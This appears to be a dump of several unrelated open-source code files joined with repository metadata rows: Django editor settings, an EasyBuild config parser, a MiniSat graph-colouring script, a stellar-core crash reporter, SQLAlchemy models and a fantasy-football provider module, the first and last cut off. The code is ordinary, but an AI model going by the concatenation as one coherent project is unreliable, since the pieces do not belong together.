'spellchecker_language': 'en_US',
'plugin_preview_width': 1024,
'plugin_preview_height': 600,
'image_advtab': True,
'default_link_target': '_blank',
'extended_valid_elements': 'span[class]',
'spoiler_caption': '<span class="fa fa-plus-square"></span> Click to show',
'pagebreak_separator': '<!-- ***Blog Cut*** -->',
'external_plugins': {
'spoiler': '../../../common_content/js/spoiler/plugin.min.js',
'django_saveandcontinue': '../../../common_content/js/django_saveandcontinue/plugin.min.js',
'codesample': '../../../common_content/js/codesample/plugin.min.js',
'preview': '../../../common_content/js/preview/plugin.min.js'
},
'codesample_languages': [
{'text': 'Python', 'value': 'python'},
{'text': 'HTML/XML', 'value': 'markup'},
{'text': 'Django/Jinja2', 'value': 'django'},
{'text': 'CSS', 'value': 'css'},
{'text': 'JavaScript', 'value': 'javascript'},
{'text': 'C++', 'value': 'cpp'},
{'text': 'C', 'value': 'c'},
{'text': 'C#', 'value': 'csharp'},
{'text': 'Windows BAT', 'value': 'batch'},
{'text': 'Bash', 'value': 'bash'},
{'text': 'YAML', 'value': 'yaml'},
{'text': 'SQL', 'value': 'sql'},
{'text': 'reStructuredText', 'value': 'rest'},
{'text': 'Plain Text', 'value': 'none'},
],
'content_css': [common_content_base_url + 'css/prism.css'],
}
TINYMCE_SPELLCHECKER = True
TINYMCE_ADDITIONAL_JS_URLS = [
common_content_base_url + 'js/prism.min.js',
common_content_base_url + 'js/prism-django.min.js'
]
# Skin-specific settings
CURRENT_SKIN = 'bootstrap4_skin'
BLOG_POSTS_PAGINATE_BY = 5
TINYMCE_DEFAULT_CONFIG['image_class_list'] = [
{'title': 'Responsive', 'value': 'img-fluid'},
{'title': 'Rounded', 'value': 'img-fluid rounded'},
{'title': 'Thumbnail', 'value': 'img-fluid img-thumbnail'},
]
TINYMCE_DEFAULT_CONFIG['table_class_list'] = [
{'title': 'Simple', 'value': 'table'},
{'title': 'Bordered', 'value': 'table table-bordered'},
{'title': 'Striped', 'value': 'table table-striped'},
{'title': 'Small', 'value': 'table table-sm'},
]
TINYMCE_DEFAULT_CONFIG['table_row_class_list'] = [
{'title': 'None', 'value': ''},
{'title': 'Green', 'value': 'table-success'},
{'title': 'Red', 'value': 'table-danger'},
{'title': 'Blue', 'value': 'table-primary'},
]
TINYMCE_DEFAULT_CONFIG['content_css'] += [
STATIC_URL + 'bootstrap4_skin/css/bootstrap.min.css',
STATIC_URL + 'bootstrap4_skin/css/font-awesome-all.min.css',
STATIC_URL + 'bootstrap4_skin/css/styles.css',
]
DEFAULT_LOGO = STATIC_URL + 'bootstrap4_skin/img/favicon.png'
DEFAULT_FEATURED_IMAGE = STATIC_URL + 'bootstrap4_skin/img/featured/home.jpg'
# Haystack search settings
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.whoosh_backend.WhooshEngine',
'PATH': os.path.join(BASE_DIR, 'whoosh_index'),
},
}
# Enable this if your server has enough power to update index on every save
# HAYSTACK_SIGNAL_PROCESSOR = 'haystack.signals.RealtimeSignalProcessor'
| gpl-3.0 | 5,356,922,818,080,607,000 | 32.546939 | 115 | 0.633654 | false | 3.316788 | false | false | false |
ULHPC/easybuild-framework | easybuild/framework/easyconfig/parser.py | 3 | 9516 | # #
# Copyright 2013-2017 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
# #
"""
This describes the easyconfig parser
The parser is format version aware
:author: Stijn De Weirdt (Ghent University)
"""
import os
import re
from vsc.utils import fancylogger
from easybuild.framework.easyconfig.format.format import FORMAT_DEFAULT_VERSION
from easybuild.framework.easyconfig.format.format import get_format_version, get_format_version_classes
from easybuild.framework.easyconfig.format.yeb import FormatYeb, is_yeb_format
from easybuild.framework.easyconfig.types import PARAMETER_TYPES, check_type_of_param_value
from easybuild.tools.build_log import EasyBuildError
from easybuild.tools.filetools import read_file, write_file
# deprecated easyconfig parameters, and their replacements
DEPRECATED_PARAMETERS = {
# <old_param>: (<new_param>, <deprecation_version>),
}
# replaced easyconfig parameters, and their replacements
REPLACED_PARAMETERS = {
'license': 'license_file',
'makeopts': 'buildopts',
'premakeopts': 'prebuildopts',
}
_log = fancylogger.getLogger('easyconfig.parser', fname=False)
def fetch_parameters_from_easyconfig(rawtxt, params):
"""
Fetch (initial) parameter definition from the given easyconfig file contents.
:param rawtxt: contents of the easyconfig file
:param params: list of parameter names to fetch values for
"""
param_values = []
for param in params:
regex = re.compile(r"^\s*%s\s*(=|: )\s*(?P<param>\S.*?)\s*$" % param, re.M)
res = regex.search(rawtxt)
if res:
param_values.append(res.group('param').strip("'\""))
else:
param_values.append(None)
_log.debug("Obtained parameters value for %s: %s" % (params, param_values))
return param_values
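# Hedged usage sketch (the easyconfig snippet below is hypothetical):
#   rawtxt = "name = 'GCC'\nversion = '4.9.2'\n"
#   fetch_parameters_from_easyconfig(rawtxt, ['name', 'version'])  # -> ['GCC', '4.9.2']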
class EasyConfigParser(object):
"""Read the easyconfig file, return a parsed config object
    Can contain references to multiple versions and toolchain/toolchain versions
"""
def __init__(self, filename=None, format_version=None, rawcontent=None,
auto_convert_value_types=True):
"""
Initialise the EasyConfigParser class
:param filename: path to easyconfig file to parse (superseded by rawcontent, if specified)
:param format_version: version of easyconfig file format, used to determine how to parse supplied easyconfig
:param rawcontent: raw content of easyconfig file to parse (preferred over easyconfig file supplied via filename)
:param auto_convert_value_types: indicates whether types of easyconfig values should be automatically converted
in case they are wrong
"""
self.log = fancylogger.getLogger(self.__class__.__name__, fname=False)
self.rawcontent = None # the actual unparsed content
self.auto_convert = auto_convert_value_types
self.get_fn = None # read method and args
self.set_fn = None # write method and args
self.format_version = format_version
self._formatter = None
if rawcontent is not None:
self.rawcontent = rawcontent
self._set_formatter(filename)
elif filename is not None:
self._check_filename(filename)
self.process()
else:
raise EasyBuildError("Neither filename nor rawcontent provided to EasyConfigParser")
self._formatter.extract_comments(self.rawcontent)
def process(self, filename=None):
"""Create an instance"""
self._read(filename=filename)
self._set_formatter(filename)
def check_values_types(self, cfg):
"""
Check types of easyconfig parameter values.
:param cfg: dictionary with easyconfig parameter values (result of get_config_dict())
"""
wrong_type_msgs = []
for key in cfg:
type_ok, newval = check_type_of_param_value(key, cfg[key], self.auto_convert)
if not type_ok:
wrong_type_msgs.append("value for '%s' should be of type '%s'" % (key, PARAMETER_TYPES[key].__name__))
elif newval != cfg[key]:
self.log.warning("Value for '%s' easyconfig parameter was converted from %s (type: %s) to %s (type: %s)",
key, cfg[key], type(cfg[key]), newval, type(newval))
cfg[key] = newval
if wrong_type_msgs:
raise EasyBuildError("Type checking of easyconfig parameter values failed: %s", ', '.join(wrong_type_msgs))
else:
self.log.info("Type checking of easyconfig parameter values passed!")
def _check_filename(self, fn):
"""Perform sanity check on the filename, and set mechanism to set the content of the file"""
if os.path.isfile(fn):
self.get_fn = (read_file, (fn,))
self.set_fn = (write_file, (fn, self.rawcontent))
self.log.debug("Process filename %s with get function %s, set function %s" % (fn, self.get_fn, self.set_fn))
if self.get_fn is None:
raise EasyBuildError('Failed to determine get function for filename %s', fn)
if self.set_fn is None:
raise EasyBuildError('Failed to determine set function for filename %s', fn)
def _read(self, filename=None):
"""Read the easyconfig, dump content in self.rawcontent"""
if filename is not None:
self._check_filename(filename)
try:
self.rawcontent = self.get_fn[0](*self.get_fn[1])
except IOError, err:
raise EasyBuildError('Failed to obtain content with %s: %s', self.get_fn, err)
if not isinstance(self.rawcontent, basestring):
msg = 'rawcontent is not basestring: type %s, content %s' % (type(self.rawcontent), self.rawcontent)
raise EasyBuildError("Unexpected result for raw content: %s", msg)
def _det_format_version(self):
"""Extract the format version from the raw content"""
if self.format_version is None:
self.format_version = get_format_version(self.rawcontent)
if self.format_version is None:
self.format_version = FORMAT_DEFAULT_VERSION
self.log.debug('No version found, using default %s' % self.format_version)
def _get_format_version_class(self):
"""Locate the class matching the version"""
if self.format_version is None:
self._det_format_version()
found_classes = get_format_version_classes(version=self.format_version)
if len(found_classes) == 1:
return found_classes[0]
elif not found_classes:
raise EasyBuildError('No format classes found matching version %s', self.format_version)
else:
raise EasyBuildError("More than one format class found matching version %s in %s",
self.format_version, found_classes)
def _set_formatter(self, filename):
"""Obtain instance of the formatter"""
if self._formatter is None:
if is_yeb_format(filename, self.rawcontent):
self._formatter = FormatYeb()
else:
klass = self._get_format_version_class()
self._formatter = klass()
self._formatter.parse(self.rawcontent)
def set_format_text(self):
"""Create the text for the formatter instance"""
# TODO create the data in self.rawcontent
raise NotImplementedError
def write(self, filename=None):
"""Write the easyconfig format instance, using content in self.rawcontent."""
if filename is not None:
self._check_filename(filename)
try:
self.set_fn[0](*self.set_fn[1])
except IOError, err:
raise EasyBuildError("Failed to process content with %s: %s", self.set_fn, err)
def set_specifications(self, specs):
"""Set specifications."""
self._formatter.set_specifications(specs)
def get_config_dict(self, validate=True):
"""Return parsed easyconfig as a dict."""
# allows to bypass the validation step, typically for testing
if validate:
self._formatter.validate()
cfg = self._formatter.get_config_dict()
self.check_values_types(cfg)
return cfg
def dump(self, ecfg, default_values, templ_const, templ_val):
"""Dump easyconfig in format it was parsed from."""
return self._formatter.dump(ecfg, default_values, templ_const, templ_val)
| gpl-2.0 | 3,530,974,173,393,378,000 | 40.373913 | 121 | 0.650378 | false | 4.025381 | true | false | false |
philoliver/minisat-problem-generators | k_color.py | 1 | 1281 | #!/usr/bin/env python
import argparse
from k_color_minisat_problem import KColorProblem
def make_args_parser():
parser = argparse.ArgumentParser( description='Generates or interpretes the k-color problem for the MiniSat solver', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--file', required=True, type=str, help='The path to a text file. Either output for the problem or input of the solution')
	parser.add_argument('--action', required=True, type=str, help='Either "generate" or "interpret"')
return parser.parse_args()
def write_file(file, content):
text_file = open(file, "w")
text_file.write(content)
text_file.close()
def read_file(file):
text_file = open(file, "r")
content = text_file.read()
text_file.close()
return content
def run():
args = make_args_parser()
if args.action not in ["generate", "interpret"]:
raise Exception("Action has to be either 'generate' or 'interpret'.")
else:
problem = KColorProblem()
if args.action == "generate":
write_file(args.file, problem.generate_minisat_problem())
else:
solution = read_file(args.file)
print (problem.interprete_minisat_problem(solution))
if __name__ == "__main__":
run()
| gpl-2.0 | -2,309,434,677,390,948,400 | 27.488889 | 174 | 0.679938 | false | 3.670487 | false | false | false |
stellar/docker-stellar-core | utils/core_file_processor.py | 2 | 6559 | #!/usr/bin/env python
import logging
import sys
import ConfigParser
import os
import socket
import time
import subprocess
from string import Template
import textwrap
import boto.ses
def format_time(epoch_time):
time_format = "%Y-%m-%dT%H:%M:%S"
return time.strftime(time_format, time.gmtime(epoch_time))
class CoreMailer(object):
def __init__(self, config):
self.config = config
self.hostname = self.config.get('Config', 'hostname')
self.out = sys.stdout
def find_core(self):
path = self.config.get('Config', 'cores')
core_filter = self.config.get('Config', 'core_filter')
cores = [os.path.join(path, core) for core in os.listdir(path) if core_filter in core]
if len(cores):
return max(cores, key=os.path.getctime)
def filter_logs(self, logs):
log_filter = self.config.get('Config', 'log_filter')
if not log_filter:
return logs
def strip_prefix(line):
first_space = line.index(' ')
following_colon = line.index(':', first_space)
return line[0:first_space] + line[following_colon:]
lines = logs.split("\n")
filtered = filter(lambda line: log_filter in line, lines)
stripped = map(strip_prefix, filtered)
return "\n".join(stripped)
def find_logs(self, epoch_time):
log = self.config.get('Config', 'log')
formatted_time = format_time(epoch_time)
logging.info('Searching %s for logs around %s', log, formatted_time)
command = ["egrep",
"-C1000",
("^%s" % formatted_time),
log]
try:
return self.filter_logs(subprocess.check_output(command))
except subprocess.CalledProcessError:
return 'Unable to retrieve logs around %s' % formatted_time
def get_trace(self, core):
binary = self.config.get('Config', 'bin')
logging.info('Processing core file %s with binary %s', core, binary)
# matschaffer: this is really awful
# But lldb just exits with no output and exit code -11 if I try to run
# this script as a container entry point
lldb_command = "lldb-3.6 -f %(binary)s -c %(core)s --batch " + \
"-o 'target create -c \"%(core)s\" \"%(binary)s\"' " + \
"-o 'script import time; time.sleep(1)' " + \
"-o 'thread backtrace all'"
command = ["script", "-c",
(lldb_command % {"core": core, "binary": binary})]
return subprocess.check_output(command, stderr=subprocess.STDOUT)
def send_alert(self, epoch_time, trace, logs):
template_vars = {
"hostname": self.hostname,
"binary": self.config.get('Config', 'bin'),
"formatted_time": format_time(epoch_time),
"trace": trace,
"logs": logs
}
sender = self.config.get('Config', 'from')
recipient = self.config.get('Config', 'to')
subject = 'stellar-core crash on %(hostname)s' % template_vars
template = textwrap.dedent("""
<p>${binary} on ${hostname} crashed at ${formatted_time} with the
following back traces:</p>
<pre><code>
${trace}
</code></pre>
<h2>Extracted logs</h2>
<pre><code>
${logs}
</code></pre>
""")
body = Template(template).substitute(template_vars)
logging.info("Sending core alert from %s to %s", sender, recipient)
self.send_email(sender, recipient, subject, body)
def send_email(self, sender, recipient, subject, body):
conn = boto.ses.connect_to_region(self.config.get('Config', 'region'))
# noinspection PyTypeChecker
conn.send_email(sender, subject, None, [recipient], html_body=body)
def output_trace(self, epoch_time, trace):
template_vars = {
"hostname": self.hostname,
"binary": self.config.get('Config', 'bin'),
"formatted_time": format_time(epoch_time),
"trace": trace
}
template = textwrap.dedent("""
${binary} on ${hostname} crashed at ${formatted_time} with the
following back traces:
${trace}
""")
body = Template(template).substitute(template_vars)
self.out.write(body)
def archive_core(self, core):
command_string = self.config.get('Config', 'archive_command')
if command_string:
core_path = os.path.join(self.hostname, os.path.basename(core))
command_string = command_string.format(core, core_path)
logging.info(subprocess.check_output(command_string.split(' ')))
else:
logging.warn("No archive command, just removing core file")
os.remove(core)
def run(self, single_core):
core = single_core or self.find_core()
mode = self.config.get('Config', 'mode')
if core:
logging.info('Found core file %s', core)
epoch_time = os.path.getctime(core)
trace = self.get_trace(core)
if mode == "aws":
logs = self.find_logs(epoch_time)
self.send_alert(epoch_time, trace, logs)
self.archive_core(core)
elif mode == "local":
self.output_trace(epoch_time, trace)
else:
logging.fatal("Unknown MODE setting: %s", mode)
sys.exit(1)
else:
logging.info('No core file found for processing')
if __name__ == "__main__":
if len(sys.argv) > 1:
single_core = sys.argv[1]
else:
single_core = None
config_file = "/etc/core_file_processor.ini"
logging.basicConfig(level=logging.INFO)
config_parser = ConfigParser.ConfigParser({
"region": "us-east-1",
"cores": "/cores",
"log": "/host/syslog",
"log_filter": os.environ.get('CORE_LOG_FILTER'),
"core_filter": "stellar-core",
"hostname": socket.gethostname(),
"from": "%(hostname)s <ops+%(hostname)[email protected]>",
"to": os.environ.get('CORE_ALERT_RECIPIENT'),
"bin": "/usr/local/bin/stellar-core",
"archive_command": os.environ.get('CORE_ARCHIVE_COMMAND'),
"mode": os.environ.get('MODE', 'aws')
})
config_parser.add_section("Config")
config_parser.read(config_file)
mailer = CoreMailer(config_parser)
mailer.run(single_core)
| apache-2.0 | -9,167,132,196,704,341,000 | 32.984456 | 94 | 0.567465 | false | 3.835673 | true | false | false |
sloww/cntslinkgit | app_printer/migrations/0009_auto_20150531_1655.py | 1 | 4323 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django_markdown.models
class Migration(migrations.Migration):
dependencies = [
('app_printer', '0008_auto_20150531_1624'),
]
operations = [
migrations.CreateModel(
name='CBase',
fields=[
('id', models.AutoField(primary_key=True, auto_created=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=300)),
('order_index', models.IntegerField(default=0)),
('title', models.CharField(blank=True, max_length=300)),
('meta_description', models.TextField(blank=True)),
('page_url', models.CharField(max_length=300)),
('img_url', models.CharField(blank=True, max_length=300)),
('description', django_markdown.models.MarkdownField()),
],
),
migrations.RemoveField(
model_name='article',
name='description',
),
migrations.RemoveField(
model_name='article',
name='id',
),
migrations.RemoveField(
model_name='article',
name='name',
),
migrations.RemoveField(
model_name='article',
name='set_url',
),
migrations.RemoveField(
model_name='brand',
name='description',
),
migrations.RemoveField(
model_name='brand',
name='id',
),
migrations.RemoveField(
model_name='brand',
name='logo_url',
),
migrations.RemoveField(
model_name='brand',
name='name',
),
migrations.RemoveField(
model_name='brand',
name='order_index',
),
migrations.RemoveField(
model_name='brand',
name='set_url',
),
migrations.RemoveField(
model_name='printer',
name='description',
),
migrations.RemoveField(
model_name='printer',
name='id',
),
migrations.RemoveField(
model_name='printer',
name='img_url',
),
migrations.RemoveField(
model_name='printer',
name='name',
),
migrations.RemoveField(
model_name='printer',
name='set_url',
),
migrations.RemoveField(
model_name='printer',
name='title',
),
migrations.RemoveField(
model_name='printtype',
name='description',
),
migrations.RemoveField(
model_name='printtype',
name='id',
),
migrations.RemoveField(
model_name='printtype',
name='name',
),
migrations.RemoveField(
model_name='printtype',
name='order_index',
),
migrations.RemoveField(
model_name='printtype',
name='set_url',
),
migrations.AddField(
model_name='article',
name='cbase_ptr',
field=models.OneToOneField(default=1, auto_created=True, serialize=False, primary_key=True, parent_link=True, to='app_printer.CBase'),
preserve_default=False,
),
migrations.AddField(
model_name='brand',
name='cbase_ptr',
field=models.OneToOneField(default=1, auto_created=True, serialize=False, primary_key=True, parent_link=True, to='app_printer.CBase'),
preserve_default=False,
),
migrations.AddField(
model_name='printer',
name='cbase_ptr',
field=models.OneToOneField(default=1, auto_created=True, serialize=False, primary_key=True, parent_link=True, to='app_printer.CBase'),
preserve_default=False,
),
migrations.AddField(
model_name='printtype',
name='cbase_ptr',
field=models.OneToOneField(default=1, auto_created=True, serialize=False, primary_key=True, parent_link=True, to='app_printer.CBase'),
preserve_default=False,
),
]
| gpl-2.0 | -4,347,683,951,444,904,000 | 30.786765 | 146 | 0.517927 | false | 4.517241 | false | false | false |
jmschrei/discern | analysis/cld.py | 1 | 1089 | # discern
# Contact: Jacob Schreiber ([email protected])
from cancer_analyses import *
import pandas as pd
import argparse
import sys
def parse_command_line():
'''
Parse the command line and return the parser.
'''
parser = argparse.ArgumentParser( description="Read in Data" )
parser.add_argument( '-n', action='store', type=file,
help='A CSV file of gene expression data for healthy patients.' )
parser.add_argument( '-c', action='store', type=file,
help='A CSV file of gene expression data for cancerous patients.' )
parser.add_argument( '-l', type=float, action='store', default=0.5,
help='A value of lambda to run DISCERN at.')
args = parser.parse_args()
return args
def run_analyses():
'''
Run the analyses indicated by the number of arguments passed in.
'''
parser = parse_command_line()
cancer = pd.read_csv( parser.c, index_col=0 ).T
normal = pd.read_csv( parser.n, index_col=0 ).T
discern_scores = run_discern( normal, cancer, cancer.columns, parser.l, sys.stdout )
def main():
print "a"
run_analyses()
if __name__ == '__main__':
main() | mit | -6,341,495,483,213,560,000 | 24.952381 | 85 | 0.694215 | false | 3.008287 | false | false | false |
arpho/mmasgis5 | mmasgis/mysql_sqlalchemy_class.py | 1 | 4833 | #!/usr/bin/python
# -*- coding: latin-1 -*-
from sqlalchemy import Column, Integer, Unicode,Unicode, ForeignKey, DateTime,Float,Boolean
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import backref, mapper, relation, sessionmaker
echo=False
#def __init__(self):
Base = declarative_base()
class Pv(Base):
__tablename__='pv'
pv_id =Column('pv_id',Integer, primary_key=True)
codice = Column(Unicode)
pref_mmas =Column(Unicode)
cod_mmas =Column(Integer)
certificato =Column(Boolean)
pv_mt = Column(Boolean)
cliente= Column(Boolean)
cod_cliente =Column(Unicode)
ragione_sociale =Column('nome1', Unicode(50))
titolare =Column('nome2', Unicode(50))
tc_istat_id=Column(Integer)
indirizzo =Column(Unicode(100))
cap =Column(Unicode)
comune =Column(Unicode)
provincia =Column(Unicode(2))
tel1 =Column(Unicode(20))
tel2 =Column(Unicode(20))
tel3 =Column(Unicode(20))
cf_pi =Column(Unicode)
fax =Column(Unicode)
sito =Column(Unicode)
email =Column(Unicode)
note =Column(Unicode)
data_aggiornamento =Column(DateTime)
tc_stato_id =Column(Integer)
ins_data =Column(DateTime)
ins_utente =Column(Integer)
mod_data =Column(DateTime)
mod_utente =Column(Integer)
class rel_pv_pot(Base):
#using_table_options(useexisting=True)
__tablename__='rel_pv_pot'
tc_clpot_id=Column(Integer)
ins_data =Column(DateTime)
ins_utente =Column(Integer)
mod_data =Column(DateTime)
mod_utente =Column(Integer)
pv_id=Column(Integer,primary_key=True)
tc_pot_id =Column(Integer,primary_key=True)
valore =Column(Float)
class tc_clpot(Base):
__tablename__='tc_clpot'
tc_clpot_id=Column(Integer,primary_key=True)
testo=Column(Unicode(255))
tc_stato_id=Column(Integer)
primario=Column(Boolean)
calc_autom=Column(Boolean)
valore_min=Column(Float)
ordine=Column(Integer)
ins_data =Column(DateTime)
ins_utente =Column(Integer)
mod_data =Column(DateTime)
mod_utente =Column(Integer)
class tc_pot(Base):
__tablename__='tc_pot'
tc_pot_id=Column(Integer, primary_key=True)
tc_clpot_id=Column(Integer)
testo =Column(Unicode(255))
tc_stato_id=Column(Integer)
ordine= Column(Integer)
coeff_min=Column(Float)
coeff_max=Column(Float)
ins_data =Column(DateTime)
ins_utente =Column(Integer)
mod_data =Column(DateTime)
mod_utente =Column(Integer)
class rel_pv_par(Base):
__tablename__='rel_pv_par'
ins_data =Column(DateTime)
ins_utente =Column(Integer)
mod_data =Column(DateTime)
mod_utente =Column(Integer)
pv_id =Column(Integer, primary_key=True)
tc_clpar_id=Column(Integer)
tc_par_id=Column(Integer, primary_key=True)
class tc_par(Base):
__tablename__='tc_par'
tc_par_id =Column(Integer, primary_key=True)
tc_clpar_id=Column(Integer)
testo=Column(Unicode(255))
tc_stato_id=Column(Integer)
ordine=Column(Integer)
ins_data =Column(DateTime)
ins_utente =Column(Integer)
mod_data =Column(DateTime)
mod_utente =Column(Integer)
class tc_clpar(Base):
__tablename__='tc_clpar'
tc_clpar_id= Column(Integer,primary_key=True)
tc_stato_id= Column(Integer)
testo=Column(Unicode(255))
ordine=Column(Integer)
ins_data =Column(DateTime)
ins_utente =Column(Integer)
mod_data =Column(DateTime)
mod_utente =Column(Integer)
class rel_pv_mar(Base):
__tablename__='rel_pv_mar'
pv_id=Column(Integer,primary_key=True)
tc_clmar_id=Column(Integer, primary_key=True)
ordine=Column(Integer,primary_key=True)
uso=Column(Float)
tc_mar_id=Column(Integer)
ins_data =Column(DateTime)
ins_utente =Column(Integer)
mod_data =Column(DateTime)
mod_utente =Column(Integer)
def __repr__(self):
return "pv_id: %s,tc_clmar_id: %s, uso:%s, ordine: %s"%(self.pv_id,self.tc_clmar_id,self.uso,self.ordine)
class tc_mar(Base):
__tablename__='tc_mar'
tc_mar_id=Column(Integer,primary_key=True)
testo=Column(Unicode(255))
tc_stato_id=Column(Integer)
ins_data =Column(DateTime)
ins_utente =Column(Integer)
mod_data =Column(DateTime)
mod_utente =Column(Integer)
def __repr__(self):
return "testo: %s, tc_mar_id: %d"%(self.testo,self.tc_mar_id)
class tc_clmar(Base):
__tablename__='tc_clmar'
tc_clmar_id=Column(Integer,primary_key=True)
tc_stato_id=Column(Integer)
testo=Column(Unicode(255))
ordine=Column(Integer)
ins_data =Column(DateTime)
ins_utente =Column(Integer)
mod_data =Column(DateTime)
mod_utente =Column(Integer)
def __repr__(self):
return "%s tc_clmar_id: %s, ordine: %s"%(self.testo,self.tc_clmar_id,self.ordine)
class tc_rel_clmar_mar(Base):
__tablename__='tc_rel_clmar_mar'
tc_clmar_id=Column(Integer, primary_key=True)
tc_mar_id=Column(Integer,primary_key=True)
ins_data =Column(DateTime)
ins_utente =Column(Integer)
mod_data =Column(DateTime)
mod_utente =Column(Integer)
def __repr__(self):
return "tc_clmar_id: %s,tc_mar_id:%s"%(self.tc_clmar_id,self.tc_mar_id)
| mit | -1,064,273,608,022,488,800 | 26.305085 | 108 | 0.725222 | false | 2.479733 | true | false | false |
ruibarreira/linuxtrail | usr/lib/python3/dist-packages/orca/scripts/apps/gnome-documents/script_utilities.py | 4 | 1531 | # Orca
#
# Copyright (C) 2013 The Orca Team.
#
# Author: Joanmarie Diggs <[email protected]>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA 02110-1301 USA.
__id__ = "$Id$"
__version__ = "$Revision$"
__date__ = "$Date$"
__copyright__ = "Copyright (c) 2013 The Orca Team."
__license__ = "LGPL"
import pyatspi
import orca.script_utilities as script_utilities
import orca.scripts.toolkits.gtk as gtk
class Utilities(gtk.Utilities):
def __init__(self, script):
gtk.Utilities.__init__(self, script)
def isReadOnlyTextArea(self, obj):
if obj.getRole() == pyatspi.ROLE_DOCUMENT_FRAME:
return False
return gtk.Utilities.isReadOnlyTextArea(self, obj)
def isTextArea(self, obj):
if obj.getRole() == pyatspi.ROLE_DOCUMENT_FRAME:
return True
return gtk.Utilities.isTextArea(self, obj)
| gpl-3.0 | 4,387,624,754,159,167,000 | 30.895833 | 68 | 0.700196 | false | 3.653938 | false | false | false |
BurntSushi/nflfan | nflfan/provider.py | 1 | 24616 | from __future__ import absolute_import, division, print_function
from collections import namedtuple
import json
import os
import re
import sys
import time
import requests
from bs4 import BeautifulSoup
import nfldb
import nflfan.config
__pdoc__ = {}
_user_agent = 'Mozilla/5.0 (X11; Linux x86_64)'
# _user_agent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2498.0 Safari/537.36'
# _user_agent = ''
"""
The user agent string is heuristically determined. Namely, I was having
problems getting some providers to authenticate with more vague user
agent strings.
You may want to use a different user agent string entirely if you're
writing your own provider.
"""
_urls = {
'yahoo': {
'owner': 'http://football.fantasysports.yahoo.com/f1/%s/teams',
'matchup': 'http://football.fantasysports.yahoo.com/f1/%s/'
'matchup?matchup_week=%d&ajaxrequest=1',
'roster': 'http://football.fantasysports.yahoo.com/f1/%s/%s?week=%d',
},
'espn': {
'owner': 'http://games.espn.go.com/ffl/leaguesetup'
'/ownerinfo?leagueId={league_id}&seasonId={season_id}',
'matchup': 'http://games.espn.go.com/ffl/scoreboard?'
'leagueId={league_id}&matchupPeriodId={week}'
'&seasonId={season_id}',
'roster': 'http://games.espn.go.com/ffl/playertable/prebuilt/'
'manageroster?leagueId={league_id}&teamId={team_id}'
'&seasonId={season_id}&scoringPeriodId={week}'
'&view=overview&context=clubhouse'
'&ajaxPath=playertable/prebuilt/manageroster'
'&managingIr=false&droppingPlayers=false&asLM=false',
},
}
def pp(soup):
print(soup.prettify().encode('utf-8'))
def eprint(*args, **kwargs):
kwargs['file'] = sys.stderr
args = ['[nflfan]'] + list(args)
print(*args, **kwargs)
def player_search(db, full_name, team=None, position=None):
"""
A thin wrapper around `nfldb.player_search` that tries searching
with `team` or `position` when given, but if no results are found,
then this returns the results of a search with just the full name.
This allows for a slightly out-of-date database to still provide
a match while also disambiguating players with the same name.
"""
if position not in nfldb.Enums.player_pos:
position = None
p, _ = nfldb.player_search(db, full_name, team=team, position=position)
if p is None and position is not None:
p, _ = nfldb.player_search(db, full_name, team=team, position=None)
if p is None and team is not None:
p, _ = nfldb.player_search(db, full_name, team=None, position=position)
if p is None and team is not None and position is not None:
p, _ = nfldb.player_search(db, full_name, team=None, position=None)
return p
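# Hedged usage sketch (the player, team and position here are just an example):
#   db = nfldb.connect()
#   p = player_search(db, 'Tom Brady', team='NE', position='QB')
#   if p is not None:
#       print(p.full_name)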
class League (namedtuple('League',
'season phase ident prov_name name scoring conf')):
__pdoc__['League.season'] = \
"""The year of the NFL season for this league."""
__pdoc__['League.phase'] = \
"""The phase of the season: preseason, regular or post."""
__pdoc__['League.ident'] = \
"""
A unique identifier for this league. The type and format of
this value is provider dependent.
"""
__pdoc__['League.prov_name'] = \
"""The name of the provider for this league."""
__pdoc__['League.name'] = \
"""The name of this league from the configuration."""
__pdoc__['League.scoring'] = \
"""The `nflfan.ScoreSchema` for this league."""
__pdoc__['League.conf'] = \
"""
A dictionary of configuration settings. The keys and values in
this dictionary are provider dependent.
"""
def __init__(self, *args):
super(League, self).__init__(*args)
self._cache = {}
@property
def full_name(self):
return '%s.%s' % (self.prov_name, self.name)
def is_me(self, obj):
if not self.conf.get('me', None):
return False
if isinstance(obj, Roster):
return self.is_me(obj.owner)
elif isinstance(obj, Matchup):
return self.is_me(obj.owner1) or self.is_me(obj.owner2)
else:
return self.conf['me'].lower() in obj.name.lower()
def me(self, objs):
for obj in objs:
if self.is_me(obj):
return obj
return None
def owners(self, week):
return self._cached(week, 'owners')
def owner(self, week, ident):
for o in self.owners(week):
if o.ident == ident:
return o
return None
def matchups(self, week):
return self._cached(week, 'matchups')
def matchup(self, week, ident):
for m in self.matchups(week):
if m.owner1 is None or m.owner2 is None:
continue
if m.owner1.ident == ident or m.owner2.ident == ident:
return m
return None
def rosters(self, week):
return self._cached(week, 'rosters')
